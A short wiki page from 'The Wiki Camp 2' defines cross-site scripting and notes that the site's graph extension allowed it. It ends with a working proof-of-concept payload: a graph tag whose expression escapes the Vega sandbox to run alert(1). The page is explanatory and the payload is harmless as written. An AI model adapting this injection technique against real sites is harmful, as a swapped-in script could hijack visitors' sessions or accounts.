XSS

From The Wiki Camp 2
Jump to navigation Jump to search

XSS, short for Cross-Site Scripting is an attack that allows for arbitrary execution of JavaScript on a webpage. A common test for XSS is the short script alert(1) which opens a dialog box on the screen containing the number 1. The Wiki Camp 2 even has an XSS due to the graph extension being installed.[not anymore][anymore][not anymore] Graphs are still disabled on Wikipedia for this reason.

<graph>{"signals":[{"name":"a","init":{"expr":"indexof(({indexOf:indexof({indexOf:[].flat.constructor},'c','(0,eval)(c)')}||0),'alert(1)')"} }]} </graph>

Retrieved from "https://camp2.rectangle.zone/index.php?title=XSS&oldid=127889"